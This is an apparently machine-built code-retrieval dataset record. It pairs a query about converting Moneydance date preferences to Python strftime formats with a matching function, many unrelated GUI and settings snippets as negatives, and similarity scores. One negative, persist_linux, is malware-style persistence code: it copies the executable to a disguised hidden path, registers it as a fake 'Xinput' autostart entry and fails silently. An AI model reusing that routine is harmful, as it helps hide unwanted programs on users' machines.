preferenceNode['ScriptEditorFontSize'].setValue(12.0)\n preferenceNode['kwdsFgColour'].setValue(2629566719L)\n preferenceNode['stringLiteralsFgColourDQ'].setValue(10354943)\n preferenceNode['stringLiteralsFgColourSQ'].setValue(10354943)\n preferenceNode['commentsFgColour'].setValue(2442236415L)", "def saveConfigFileDlg( self ):\n fileName = QtGui.QFileDialog.getSaveFileName( self, \"Save Full Config As...\", self.rsrc.lastFolder, \"Config files (*.cfg)\" )\n if ( fileName ):\n self.saveConfigFile( fileName )\n path, fName = os.path.split( str( fileName ) )\n self.rsrc.lastFolder = path", "def __init__(self, desktopentry = None, parent = None):\n\t\tgtk.Dialog.__init__(self, parent = parent)\n\t\tself.set_icon_from_file(\"pixmaps/ubuntu-tweak.png\")\n\n\t\tlbl1 = gtk.Label()\n\t\tlbl1.set_markup(_(\"<b>Name:</b>\"));\n\t\tlbl2 = gtk.Label()\n\t\tlbl2.set_markup(_(\"<b>Command:</b>\"));\n\t\tlbl3 = gtk.Label()\n\t\tlbl3.set_markup(_(\"<b>Comment:</b>\"));\n\n\t\tself.pm_name = gtk.Entry ();\n\t\tself.pm_name.connect(\"activate\", self.on_entry_activate)\n\t\tself.pm_cmd = gtk.Entry ();\n\t\tself.pm_cmd.connect(\"activate\", self.on_entry_activate)\n\t\tself.pm_comment = gtk.Entry ();\n\t\tself.pm_comment.connect(\"activate\", self.on_entry_activate)\n\n\t\tif desktopentry:\n\t\t\tself.set_title(_(\"Edit Startup Program\"))\n\t\t\tself.pm_name.set_text(desktopentry.getName())\n\t\t\tself.pm_cmd.set_text(desktopentry.getExec())\n\t\t\tself.pm_comment.set_text(desktopentry.getComment())\n\t\telse:\n\t\t\tself.set_title(_(\"New Startup Program\"))\n\n\t\tbutton = gtk.Button(_(\"_Browse\"))\n\t\tbutton.connect(\"clicked\", self.on_choose_program)\n\t\t\n\t\thbox = gtk.HBox(False, 5)\n\t\thbox.pack_start(self.pm_cmd)\n\t\thbox.pack_start(button, False, False, 0)\n\n\t\ttable = gtk.Table(3, 2)\n\t\ttable.attach(lbl1, 0, 1, 0, 1, ypadding = 10)\n\t\ttable.attach(lbl2, 0, 1, 1, 2, ypadding = 10)\n\t\ttable.attach(lbl3, 0, 1, 2, 3, ypadding = 10)\n\t\ttable.attach(self.pm_name, 1, 2, 0, 1)\n\t\ttable.attach(hbox, 1, 2, 1, 2)\n\t\ttable.attach(self.pm_comment, 1, 2, 2, 3)\n\n\t\tself.vbox.pack_start(table)\n\n\t\tself.add_button(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL)\n\t\tself.add_button(gtk.STOCK_OK, gtk.RESPONSE_OK)\n\n\t\tself.set_default_response(gtk.RESPONSE_OK)\n\n\t\tself.show_all()", "def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)", "def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)", "def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)", "def test_plugin_macosx_terminal_notifier_invalid(macos_notify_environment):\n\n obj = apprise.Apprise.instantiate('macosx://', suppress_exceptions=False)\n\n # Let's disrupt the path location.\n obj.notify_path = 'invalid_missing-file'\n assert not os.path.isfile(obj.notify_path)\n\n assert obj.notify(title='title', body='body',\n notify_type=apprise.NotifyType.INFO) is False", "def setPreferencesAtStartup(self):\n\t\tif os.path.isfile(self.userPrefsFileName):\n\t\t\tprefs = open(self.userPrefsFileName, 'r')\n\t\t\tprefsLine = prefs.readline()\n\t\t\tprefs.close()\n\t\t\t\n\t\t\tfor i in range(0,len(prefsLine)):\n\t\t\t\tc = prefsLine[i]\n\t\t\t\tif c is not \"/\":\n\t\t\t\t\tself.setPreference(c)\n\t\t\t\telse:\n\t\t\t\t\tself.setPreference(prefsLine[i:])\n\t\t\t\t\tbreak", "def export_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._export_path_var.set(filename)", "def export_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._export_path_var.set(filename)", "def export_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._export_path_var.set(filename)", "def export_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._export_path_var.set(filename)", "def PromptPathOpenCmd(self):\n defaultPath = DEFAULT_PATH_TST_FILES\n defaultName = \"\"\n \n dlgSave = wxFileDialog(self, \"Run Command File\", defaultPath, defaultName,\n \"*.tst|*.*\", wxOPEN|wxCHANGE_DIR)\n if dlgSave.ShowModal() == wxID_OK:\n path = dlgSave.GetPath()\n else:\n path = None\n dlgSave.Destroy()\n return path", "def setEnvironment ( localPath ) :\r\n\r\n gtkPath = localPath + \"GTK\" + os.sep + \"bin\"\r\n\r\n tclPath = localPath + \"tcl\"\r\n\r\n os.environ[ \"PATH\" ] = os.environ[ \"PATH\" ] + \";\" + gtkPath + \";\" + tclPath + \";\"\r\n\r\n os.environ[ \"TCL_LIBRARY\" ] = tclPath + os.sep + \"tcl8.4\"\r\n\r\n os.environ[ \"TK_LIBRARY\" ] = tclPath + os.sep + \"tk8.4\"\r\n\r\n os.environ[ \"TIX_LIBRARY\" ] = tclPath + os.sep + \"tix8.1\"", "def _get_file(self, event):\n dlg = wx.FileDialog(None, \"Select a file\", \n wildcard=\"Password Files (*.*)|*.*\",\n defaultDir=os.getcwd(), \n style=wx.FD_SAVE)\n \n if dlg.ShowModal() == wx.ID_OK:\n newpath = dlg.GetPaths()[0]\n self.dbFile.Value = newpath\n \n dlg.Destroy()", "def persist_linux(self) -> None:\n home_conf_dir = os.path.expanduser('~') + '/.config/'\n autostart_path = home_conf_dir + '/autostart/'\n autostart_file = autostart_path + 'xinput.desktop'\n\n if not os.path.isfile(autostart_file):\n try:\n os.makedirs(autostart_path)\n except OSError:\n self.fail_silently()\n\n dest = home_conf_dir + 'xnput'\n shutil.copyfile(sys.executable, dest)\n\n self.add_executable_perms(dest)\n\n with open(autostart_file, 'w') as out:\n out.write(\n '[Desktop Entry]\\nType=Application\\nX-GNOME-Autostart-enabled=true\\n' # noqa: E501 pylint: disable=C0301\n )\n out.write('Name=Xinput\\nExec=' + dest + '\\n')\n\n self.add_executable_perms(autostart_file)\n\n try:\n subprocess.Popen(dest)\n except Exception: # pylint: disable=W0703\n self.fail_silently()\n\n sys.exit()", "def open_quick_settings(self):\n self.android_device_driver.adb.exec_adb_cmd(\n \"shell cmd statusbar expand-settings\").wait()", "def __init__(self, parent):\n QtGui.QDialog.__init__(self, parent)\n self.parent = parent\n self.ui = Ui_FileSelectDialog()\n self.ui.setupUi(self)\n mneRoot = os.environ.get('MNE_ROOT', '')\n if mneRoot == \"\":\n mneRoot = self.settings.value(\"MNE_ROOT\", \"\").toString()\n self.ui.lineEditMneRoot.setText(mneRoot)\n self.show()", "def action_settings(self):\n\n cur_datadir = self.config.starbound_data_dir\n settings = SettingsDialog(self)\n settings.exec()\n new_datadir = self.config.starbound_data_dir\n if new_datadir:\n if cur_datadir != new_datadir:\n self.load_data()\n self.scene.refresh(self.data)\n else:\n self.close_world()\n\n # Make sure our menus are enabled/disabled as appropriate\n self.enforce_menu_state()\n\n # Re-focus the main window\n self.activateWindow()", "def askSave(parent,title='',defaultDir='',defaultFile='',wildcard='',style=wx.OVERWRITE_PROMPT):\r\n return askOpen(parent,title,defaultDir,defaultFile,wildcard,wx.SAVE|style )", "def choosefile(self, diagtitle):\r\n root = Tk()\r\n root.withdraw()\r\n sfile = tkFileDialog.askopenfilename(\r\n parent=root,\r\n filetypes = [('.TXT files', '.txt')],\r\n title=diagtitle )\r\n return sfile", "def saveSettings(self):\n # settings object\n settings = QtCore.QSettings()\n\n # store current working directory\n settings.setValue(\"mainWindow/currentDirectory\", os.getcwd())\n\n # window size\n settings.setValue(\"mainWindow/size\", self.size())", "def open_fileDialog(self):\n\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getOpenFileName(self, \"Открыть исходный файл\", os.path.expanduser(\"~\"),\n \"XML Файлы (*.xml);;JSON Файлы (*.json)\", options=options)\n if fileName:\n file_format = fileName.split('.')[1]\n if file_format == 'xml':\n self.data_from_xml(fileName)\n elif file_format == 'json':\n self.data_from_json(fileName)\n self.msg2Statusbar.emit('Импорт из файла {0}'.format(fileName))", "def import_file_chooser(self):\n filename = tk.filedialog.askopenfilenames()\n self._import_path_var.set(filename)", "def choosefilenamedsm(self, e):\n filename = QFileDialog.getOpenFileName(self.dlg,\"Select TIFF file\",\n \"/home\", \"TIF files (*.tif);;All files (*.*)\")\n if filename:\n self.dlg.leDem.setText(filename)", "def __init__(self, terminal):\r\n super(CustomOptions, self).__init__()\r\n self.longdesc = \"\"\r\n self.terminal = terminal", "def setJFileChooserParameters(_jf, lReportOnly=False, lDefaults=False, lPackagesT=None, lApplicationsT=None, lOptionsButton=None, lNewFolderButton=None):\n\n myPrint(\"D\", \"In \", inspect.currentframe().f_code.co_name, \"()\")\n\n if not Platform.isOSX(): return\n if not isinstance(_jf, JFileChooser): return\n\n _PKG = \"JFileChooser.packageIsTraversable\"\n _APP = \"JFileChooser.appBundleIsTraversable\"\n _OPTIONS = \"JFileChooser.optionsPanelEnabled\"\n _NEWFOLDER = \"JFileChooser.canCreateDirectories\"\n\n # JFileChooser defaults: https://violetlib.org/vaqua/filechooser.html\n # \"JFileChooser.packageIsTraversable\" default False >> set \"true\" to allow Packages to be traversed\n # \"JFileChooser.appBundleIsTraversable\" default False >> set \"true\" to allow App Bundles to be traversed\n # \"JFileChooser.optionsPanelEnabled\" default False >> set \"true\" to allow Options button\n # \"JFileChooser.canCreateDirectories\" default False >> set \"true\" to allow New Folder button\n\n if debug or lReportOnly:\n myPrint(\"B\", \"Parameters set: ReportOnly: %s, Defaults:%s, PackagesT: %s, ApplicationsT:%s, OptionButton:%s, NewFolderButton: %s\" %(lReportOnly, lDefaults, lPackagesT, lApplicationsT, lOptionsButton, lNewFolderButton))\n txt = (\"Before setting\" if not lReportOnly else \"Reporting only\")\n for setting in [_PKG, _APP, _OPTIONS, _NEWFOLDER]: myPrint(\"DB\", \"%s: '%s': '%s'\" %(pad(txt,14), pad(setting,50), _jf.getClientProperty(setting)))\n if lReportOnly: return\n\n if lDefaults:\n _jf.putClientProperty(_PKG, None)\n _jf.putClientProperty(_APP, None)\n _jf.putClientProperty(_OPTIONS, None)\n _jf.putClientProperty(_NEWFOLDER, None)\n else:\n if lPackagesT is not None: _jf.putClientProperty(_PKG, lPackagesT)\n if lApplicationsT is not None: _jf.putClientProperty(_APP, lApplicationsT)\n if lOptionsButton is not None: _jf.putClientProperty(_OPTIONS, lOptionsButton)\n if lNewFolderButton is not None: _jf.putClientProperty(_NEWFOLDER, lNewFolderButton)\n\n for setting in [_PKG, _APP, _OPTIONS, _NEWFOLDER]: myPrint(\"DB\", \"%s: '%s': '%s'\" %(pad(\"After setting\",14), pad(setting,50), _jf.getClientProperty(setting)))\n\n return", "def internalVar(*args, userAppDir: bool=True, userBitmapsDir: bool=True, userHotkeyDir:\n bool=True, userMarkingMenuDir: bool=True, userPrefDir: bool=True,\n userPresetsDir: bool=True, userScriptDir: bool=True, userShelfDir: bool=True,\n userTmpDir: bool=True, userWorkspaceDir: bool=True, **kwargs)->AnyStr:\n pass", "def Save_Current_Profile(self):\r\n #name = tkFileDialog.asksaveasfilename()\r\n #if( name == \"\" ):\r\n # return\r\n #self.system.Save_Current_Profile(name)\r\n self.system.Save_Current_Profile()", "def _get_file(self, event):\n dlg = wx.FileDialog(None, \"Select a file\", \n wildcard=\"Password Files (*.*)|*.*\",\n defaultDir=os.getcwd(), \n style=wx.FD_OPEN|wx.FD_FILE_MUST_EXIST)\n \n if dlg.ShowModal() == wx.ID_OK:\n newpath = dlg.GetPaths()[0]\n self.dbFile.Value = newpath\n self._save_state()\n \n dlg.Destroy()", "def process_dialog_settings(self, ins):\n pass", "def open_file(self: object) -> None:\n self.file = filedialog.askopenfilename(\n initialdir= os.getcwd(),title=\"Select File\",filetypes=(\n (\"Text Files\", \"*.txt\"),(\"all files\",\"*.*\")))\n\n if self.file:\n messagebox.showinfo(\"Selected file\", \"You have selected %s\"%(\n self.file))", "def desktop_session(self):\n self.user['desktop_environment'] = {'name': self.user['desktop']}\n if self.user['desktop'] is not None:\n\n # Append required packages\n if self.user['desktop'] in [10, 11, 12]:\n self.user['desktop_environment']['requirements'] = \\\n '{xorg} {xinit} {numlock}'.format(\n xorg=self.packages['xorg'],\n xinit=self.packages['xinit'],\n numlock=self.packages['numlock'])\n else:\n self.user['desktop_environment']['requirements'] = \\\n '{xorg} {numlock}'.format(xorg=self.packages['xorg'],\n numlock=self.packages['numlock'])\n\n # Set desktop environment name\n self.user['desktop_environment']['name'] = \\\n self.packages['desktop']['name'][self.user['desktop']]\n\n # Append desktop environment packages\n self.user['desktop_environment']['packages'] = \\\n self.packages['desktop']['packages'][self.user['desktop']]\n\n # Append desktop environment extra packages\n if self.user['desktop_extra'] is True:\n self.user['desktop_environment']['packages'] += ' {x}'.format(\n x=self.packages['desktop']['extras'][self.user['desktop']])\n\n # Set start command\n self.user['desktop_environment']['startcmd'] = \\\n self.packages['desktop']['startcmd'][self.user['desktop']]", "def askopenfont(self, *args, **kw):\n\n self.tk.tk_setPalette('#888888')\n save_update_step = self.update_step\n self.update_step = 0\n\n filename = tkinter.filedialog.askopenfilename(parent=self.tk)\n if filename:\n self.readwtf(filename)\n self.redraw_letters()\n self.update_step = save_update_step\n self.tk.tk_setPalette('#000000')", "def init_tkvars(self):\n\n for key in self.defaultprefs:\n value = self.defaultprefs[key]\n if type(value) is types.IntType:\n var = self.__dict__[key] = IntVar()\n elif type(value) is types.StringType:\n var = self.__dict__[key] = StringVar()\n var.set(value)\n\n self.resnum = IntVar()\n self.resnum.set(1)\n # Method for calculating Tm of primers\n self.Tm_method = StringVar()\n self.Tm_method.set('Stratagene')\n if 'Darwin' in self.currplatform:\n self.seqfontsize.set(16)\n else:\n self.seqfontsize.set(14)\n return", "def openFileDialog(self): \n self.dialog = ocempgui.widgets.Box(373, 372)\n self.dialog.topleft = 528, 205\n\n background = guiobjects.OcempImageMapTransparent(GG.genteguada.GenteGuada.getInstance().getDataPath(WINDOW_UPLOAD))\n self.dialog.add_child(background)\n \n self.listDir = guiobjects.OcempImageFileList(310, 239)\n self.listDir.topleft = 31, 60\n self.dialog.add_child(self.listDir)\n\n buttonOK = guiobjects.OcempImageButtonTransparent(GG.genteguada.GenteGuada.getInstance().getDataPath(BUTTON_OK), self.buttonTooltips[\"ok\"], self.parent.showTooltip, self.parent.removeTooltip)\n buttonOK.topleft = [233, 308]\n buttonOK.connect_signal(ocempgui.widgets.Constants.SIG_CLICKED, self.closeFileDialog,\"OK\")\n self.dialog.add_child(buttonOK)\n \n buttonCancel = guiobjects.OcempImageButtonTransparent(GG.genteguada.GenteGuada.getInstance().getDataPath(BUTTON_CANCEL), self.buttonTooltips[\"cancel\"], self.parent.showTooltip, self.parent.removeTooltip)\n buttonCancel.topleft = [122, 308]\n buttonCancel.connect_signal(ocempgui.widgets.Constants.SIG_CLICKED, self.closeFileDialog,\"KO\")\n self.dialog.add_child(buttonCancel)\n\n self.window.add_child (self.dialog)", "def userSetup(self):\n if self.user[\"Save\"] == \"\":\n self.ui.b_run.setEnabled(False)\n else:\n name_split = self.splitPath(self.user[\"Save\"])[-1]\n name = name_split.split(\".\")[0]\n self.ui.l_save.setText(\"Save to: \" + name)\n\n if self.user[\"GT\"] != \"\":\n self.ui.l_ground_truth.setText(self.splitPath(self.user[\"GT\"])[-1])\n\n self.ui.l_colour.setText(self.user[\"Colour\"])", "def set_file_system( # pylint: disable=too-many-arguments\n self,\n user_open,\n user_close,\n user_read,\n user_seek,\n user_async_read,\n user_async_cancel,\n block_align=-1,\n ):\n self._call_fmod(\n \"FMOD_System_SetFileSystem\",\n FILE_OPEN_CALLBACK(user_open),\n FILE_CLOSE_CALLBACK(user_close),\n FILE_READ_CALLBACK(user_read),\n FILE_SEEK_CALLBACK(user_seek),\n FILE_ASYNCREAD_CALLBACK(user_async_read),\n FILE_ASYNCCANCEL_CALLBACK(user_async_cancel),\n block_align,\n )", "def get_menubar_path():\n return __get_environ_path('FR_MYMENUBAR')", "def set_touched(self, file: str, cmd_call: str):\n if file is None or file.upper() == 'ALL' or file in util.OPTIONS_CUI_TYPES:\n for _f, _d in self.inputs['files'].items():\n _d[cmd_call] = {file: True} if file in util.OPTIONS_CUI_TYPES else True\n else:\n print(self.inputs['files'])\n self.inputs['files'][file][cmd_call] = True", "def setPath(self, path, toNative=True):\n self.setText(path, toNative=toNative)", "def set_environment_variables(self, time_info):\n\n for identifier, file_path in self.c_dict['INPUT_LIST_DICT'].items():\n self.add_env_var(f'METPLUS_FILELIST_{identifier.upper()}',\n file_path)\n\n super().set_environment_variables(time_info)", "def updateOptions(self):\r\n if self.varSegment.get() == \"binary\":\r\n self.checkSaveBinary.config(state=tk.DISABLED)\r\n else:\r\n self.checkSaveBinary.config(state=tk.NORMAL)", "def ch_dirDialog(self):\n\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n dir_path = QFileDialog.getExistingDirectory(self, \"Выбор папки\", os.path.expanduser(\"~\"))\n if dir_path:\n self.full_ed_lines[2].setText(dir_path + '/')\n self.change_data()\n print(dir_path)", "def set_vernissagecmd_path(path):\n\n global vernissagecmd_path # Allows us to change the global value of the path.\n if path == 'default': # Change the file path back to the default value.\n vernissagecmd_path = default_vernissagecmd_path\n print('VernissageCmd.exe path changed to {path}'.format(path=default_vernissagecmd_path))\n else: # Change the file path to the new str.\n vernissagecmd_path = path\n print('VernissageCmd.exe path changed to {path}'.format(path=path))" ]
[ "0.6109975", "0.5899527", "0.5769735", "0.55686957", "0.55619633", "0.5373799", "0.5356747", "0.5335496", "0.53288305", "0.5298387", "0.5294953", "0.52298236", "0.5206536", "0.51610196", "0.514091", "0.50889593", "0.5086334", "0.5081264", "0.5057602", "0.50511295", "0.5033079", "0.5030382", "0.5021893", "0.5000733", "0.49955884", "0.49872825", "0.4971711", "0.4971711", "0.49711868", "0.49615443", "0.4949466", "0.49484566", "0.49356413", "0.4924776", "0.49144462", "0.48984668", "0.48961508", "0.48941845", "0.48664877", "0.48643452", "0.48557493", "0.48525718", "0.48521197", "0.4847862", "0.48435688", "0.48379165", "0.4836211", "0.48340404", "0.48322386", "0.48301178", "0.48243433", "0.48216283", "0.48166823", "0.4812767", "0.48098618", "0.47788337", "0.4773693", "0.47702083", "0.47637767", "0.47637767", "0.47637767", "0.47580427", "0.47559592", "0.47550383", "0.47550383", "0.47550383", "0.47550383", "0.47475305", "0.47448057", "0.47407436", "0.4733273", "0.472993", "0.47266835", "0.47252172", "0.47215477", "0.47159752", "0.47107798", "0.47017488", "0.47004065", "0.46993214", "0.469262", "0.46824366", "0.4680678", "0.46783084", "0.46740484", "0.46729544", "0.46725237", "0.46712795", "0.46650794", "0.46640426", "0.4654937", "0.46511227", "0.46477628", "0.46470842", "0.46446076", "0.4641161", "0.46347606", "0.46326387", "0.46279356", "0.46260187" ]
0.61366576
0
Returns a Python strftime format string in accordance with MD Preferences for Date Format
def convertMDShortDateFormat_strftimeFormat(lIncludeTime=False, lForceYYMMDDHMS=False): # https://strftime.org _MDFormat = MD_REF.getPreferences().getShortDateFormat() rtnFormat = "%Y-%m-%d" if lForceYYMMDDHMS: lIncludeTime = True else: if _MDFormat == "MM/dd/yyyy": rtnFormat = "%m/%d/%Y" elif _MDFormat == "MM.dd.yyyy": rtnFormat = "%m.%d.%Y" elif _MDFormat == "yyyy/MM/dd": rtnFormat = "%Y/%m/%d" elif _MDFormat == "yyyy.MM.dd": rtnFormat = "%Y.%m.%d" elif _MDFormat == "dd/MM/yyyy": rtnFormat = "%d/%m/%Y" elif _MDFormat == "dd.MM.yyyy": rtnFormat = "%d.%m.%Y" if lIncludeTime: rtnFormat += " %H:%M:%S" return rtnFormat
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def strftime(self, format):\n return \"\"", "def strftime(self, format):\n return \"\"", "def strftime(self, format):\n return \"\"", "def strftime(dt):\n return f\"{dt:%b %d,%Y %-H:%M:%S%z}\"", "def get_strftime(date_obj: dt.datetime) -> str:\n return date_obj.strftime(get_settings().datetime_format)", "def strftime(self, dtime, format): # pylint: disable=redefined-builtin\n format = self.STRFTIME_FORMATS.get(format + \"_FORMAT\", format)\n timestring = dtime.strftime(format)\n return timestring", "def strftime(self, *args, **kwargs):\n return String(super(Datetime, self).strftime(*args, **kwargs))", "def dpn_strftime(dt):\n return dt.strftime(DPN_DATE_FORMAT)", "def custom_strftime(format, t): \n return t.strftime(format).replace(\"{S}\", str(t.day) + suffix(t.day))", "def strftime(self, date_format):\n import pandas as pd\n values = self._obj.data\n values_as_series = pd.Series(values.ravel())\n strs = values_as_series.dt.strftime(date_format)\n return strs.values.reshape(values.shape)", "def when_text(d, t=None):\n if d is None:\n return ''\n # fmt = 'yyyy MMM dd (EE)'\n # txt = d.strftime(settings.SITE.date_format_strftime)\n txt = format_date(d, 'EE ')\n txt += dd.fds(d)\n if t is not None:\n txt += ' (%s)' % t.strftime(settings.SITE.time_format_strftime)\n return txt", "def _dateFmt(self, string):\n return time.strftime('%m/%d', time.strptime(string, '%B %d, %Y'))", "def strftime_localized(dtime, format): # pylint: disable=redefined-builtin\r\n\r\n if format == \"SHORT_DATE\":\r\n format = \"%x\"\r\n elif format == \"LONG_DATE\":\r\n # Translators: the translation for \"LONG_DATE_FORMAT\" must be a format\r\n # string for formatting dates in a long form. For example, the\r\n # American English form is \"%A, %B %d %Y\".\r\n # See http://strftime.org for details.\r\n format = ugettext(\"LONG_DATE_FORMAT\")\r\n if format == \"LONG_DATE_FORMAT\":\r\n format = DEFAULT_LONG_DATE_FORMAT\r\n elif format == \"DATE_TIME\":\r\n # Translators: the translation for \"DATE_TIME_FORMAT\" must be a format\r\n # string for formatting dates with times. For example, the American\r\n # English form is \"%b %d, %Y at %H:%M\".\r\n # See http://strftime.org for details.\r\n format = ugettext(\"DATE_TIME_FORMAT\")\r\n if format == \"DATE_TIME_FORMAT\":\r\n format = DEFAULT_DATE_TIME_FORMAT\r\n elif format == \"TIME\":\r\n format = \"%X\"\r\n\r\n def process_percent_code(match):\r\n \"\"\"\r\n Convert one percent-prefixed code in the format string.\r\n\r\n Called by re.sub just below.\r\n\r\n \"\"\"\r\n code = match.group()\r\n if code == \"%\":\r\n # This only happens if the string ends with a %, which is not legal.\r\n raise ValueError(\"strftime format ends with raw %\")\r\n\r\n if code == \"%a\":\r\n part = pgettext('abbreviated weekday name', WEEKDAYS_ABBREVIATED[dtime.weekday()])\r\n elif code == \"%A\":\r\n part = pgettext('weekday name', WEEKDAYS[dtime.weekday()])\r\n elif code == \"%b\":\r\n part = pgettext('abbreviated month name', MONTHS_ABBREVIATED[dtime.month])\r\n elif code == \"%B\":\r\n part = pgettext('month name', MONTHS[dtime.month])\r\n elif code == \"%p\":\r\n part = pgettext('am/pm indicator', AM_PM[dtime.hour // 12])\r\n elif code == \"%x\":\r\n # Get the localized short date format, and recurse.\r\n # Translators: the translation for \"SHORT_DATE_FORMAT\" must be a\r\n # format string for formatting dates in a brief form. For example,\r\n # the American English form is \"%b %d %Y\".\r\n # See http://strftime.org for details.\r\n actual_format = ugettext(\"SHORT_DATE_FORMAT\")\r\n if actual_format == \"SHORT_DATE_FORMAT\":\r\n actual_format = DEFAULT_SHORT_DATE_FORMAT\r\n if \"%x\" in actual_format:\r\n # Prevent infinite accidental recursion.\r\n actual_format = DEFAULT_SHORT_DATE_FORMAT\r\n part = strftime_localized(dtime, actual_format)\r\n elif code == \"%X\":\r\n # Get the localized time format, and recurse.\r\n # Translators: the translation for \"TIME_FORMAT\" must be a format\r\n # string for formatting times. For example, the American English\r\n # form is \"%H:%M:%S\". See http://strftime.org for details.\r\n actual_format = ugettext(\"TIME_FORMAT\")\r\n if actual_format == \"TIME_FORMAT\":\r\n actual_format = DEFAULT_TIME_FORMAT\r\n if \"%X\" in actual_format:\r\n # Prevent infinite accidental recursion.\r\n actual_format = DEFAULT_TIME_FORMAT\r\n part = strftime_localized(dtime, actual_format)\r\n else:\r\n # All the other format codes: just let built-in strftime take\r\n # care of them.\r\n part = dtime.strftime(code)\r\n\r\n return part\r\n\r\n formatted_date = re.sub(r\"%.|%\", process_percent_code, format)\r\n return formatted_date", "def strfdate(self, fmt):\n pattern = r'%({})'.format(reduce(lambda x, y: '{}|{}'.format(x, y), FORMAT_MAP.keys()))\n for f in re.findall(pattern, fmt):\n fmt = fmt.replace('%{}'.format(f), FORMAT_MAP[f](self))\n return fmt", "def strftime(self): # real signature unknown; restored from __doc__\r\n pass", "def strftime(self, fmt, roundofs=0): # pylint: disable=invalid-name\n _ = roundofs\n if not self._struct:\n yday = self._days - DayNum(self.year, 1, 1) + 1\n wday = _DayNumToWeekdayNum(self._days)\n self._struct = (self.year, self.month, self.day, 0, 0, 0, wday, yday, 0)\n return LocalStrftime(fmt, self._struct, '000000')", "def dt_strftime(self, date_format):\n return DateTimeDefault.register(pandas.Series.dt.strftime)(self, date_format)", "def to_format(self, format_string: str) -> str:\n return self.strftime(format_string)", "def get_template_formatted_date(date):\n return date.strftime(str(month(date.month)) + ' ' + str(date.day) + ', %Y')", "def dt_format_translate(pyfmt):\n\n translate = {\"%a\": \"ddd\",\n \"%A\": \"dddd\",\n \"%b\": \"mmm\",\n \"%B\": \"mmmm\",\n \"%c\": \"\",\n \"%d\": \"dd\",\n \"%f\": \"\",\n \"%H\": \"hh\",\n \"%I\": \"hh\",\n \"%j\": \"\",\n \"%m\": \"mm\",\n \"%M\": \"mm\",\n \"%p\": \"AM/PM\",\n \"%S\": \"ss\",\n \"%U\": \"\",\n \"%w\": \"\",\n \"%W\": \"\",\n \"%x\": \"\",\n \"%X\": \"\",\n \"%y\": \"yy\",\n \"%Y\": \"yyyy\",\n \"%z\": \"\",\n \"%Z\": \"\",\n \"%%\": \"%\"}\n\n xlfmt = str(pyfmt)\n\n for item in translate:\n if item in xlfmt:\n xlfmt = xlfmt.replace(item, translate[item])\n return xlfmt", "def strftime(self, *args, **kwargs):\r\n # This is the wrong place to import this function. I'm putting it here\r\n # because the xmodule test suite can't import this module, because\r\n # Django is not available in that suite. This function isn't called in\r\n # that suite, so this hides the import so the test won't fail.\r\n #\r\n # As I said, this is wrong. But Cale says this code will soon be\r\n # refactored to a place that will be right, and the code can be made\r\n # right there. If you are reading this comment after April 1, 2014,\r\n # then Cale was a liar.\r\n from util.date_utils import strftime_localized\r\n return strftime_localized(*args, **kwargs)", "def getFormattedDate(self, dt):\n if DATE_FORMAT_STRING == '':\n return time.strftime('%Y-%m-%d %H:%M:%S', dt.timetuple())\n else:\n return time.strftime(DATE_FORMAT_STRING, dt.timetuple())", "def formatDate(value):\n return time.strftime('%c',time.localtime(value))", "def usformat(date):\r\n return date.strftime('%m-%d-%Y %H:%M:%S')", "def dformat(val):\n if isinstance(val, datetime):\n return val.strftime(DATE_FORMAT)", "def date() -> str:\n\n return datetime.strftime(datetime.today(), _fmt)", "def date_format(date) -> str:\n if date is not None:\n str_ = date.strftime(DATE_FMT).upper()\n else:\n str_ = \" \"\n return str_", "def format_date(self, date):\n return time.strftime('%-I:%-M %p - %-d %b %Y',\n self.parse_twitter_date(date))", "def display_strptime_formatters():\n data = [\n [\"%a\", \"Weekday as locale's abbreviated name.\", \"Mon\"],\n [\"%A\", \"Weekday as locale's full name.\", \"Monday\"],\n [\"%w\", \"Weekday as a decimal number, where 0 is Sunday and 6 is Saturday.\", \"1\"],\n [\"%d\", \"Day of the month as a zero-padded decimal number.\", \"30\"],\n [\"%-d\", \"Day of the month as a decimal number. (Platform specific)\", \"30\"],\n [\"%b\", \"Month as locale's abbreviated name.\", \"Sep\"],\n [\"%B\", \"Month as locale's full name.\", \"September\"],\n [\"%m\", \"Month as a zero-padded decimal number.\", \"09\"],\n [\"%-m\", \"Month as a decimal number. (Platform specific)\", \"9\"],\n [\"%y\", \"Year without century as a zero-padded decimal number.\", \"13\"],\n [\"%Y\", \"Year with century as a decimal number.\", \"2013\"],\n [\"%H\", \"Hour (24-hour clock) as a zero-padded decimal number.\", \"07\"],\n [\"%-H\", \"Hour (24-hour clock) as a decimal number. (Platform specific)\", \"7\"],\n [\"%I\", \"Hour (12-hour clock) as a zero-padded decimal number.\", \"07\"],\n [\"%-I\", \"Hour (12-hour clock) as a decimal number. (Platform specific)\", \"7\"],\n [\"%p\", \"Locale's equivalent of either AM or PM.\", \"AM\"],\n [\"%M\", \"Minute as a zero-padded decimal number.\", \"06\"],\n [\"%-M\", \"Minute as a decimal number. (Platform specific)\", \"6\"],\n [\"%S\", \"Second as a zero-padded decimal number.\", \"05\"],\n [\"%-S\", \"Second as a decimal number. (Platform specific)\", \"5\"],\n [\"%f\", \"Microsecond as a decimal number, zero-padded on the left.\", \"000000\"],\n [\"%z\", \"UTC offset in the form +HHMM or -HHMM (empty string if the the object is naive).\", \"\"],\n [\"%Z\", \"Time zone name (empty string if the object is naive).\", \"\"],\n [\"%j\", \"Day of the year as a zero-padded decimal number.\", \"273\"],\n [\"%-j\", \"Day of the year as a decimal number. (Platform specific)\", \"273\"],\n [\"%U\", \"Week number of the year (Sunday as the first day of the week) as a zero padded decimal number. All days in a new year preceding the first Sunday are considered to be in week 0.\", \"39\"],\n [\"%W\", \"Week number of the year (Monday as the first day of the week) as a decimal number. All days in a new year preceding the first Monday are considered to be in week 0.\", \"39\"],\n [\"%c\", \"Locale's appropriate date and time representation.\", \"Mon Sep 30 07:06:05 2013\"],\n [\"%x\", \"Locale's appropriate date representation.\", 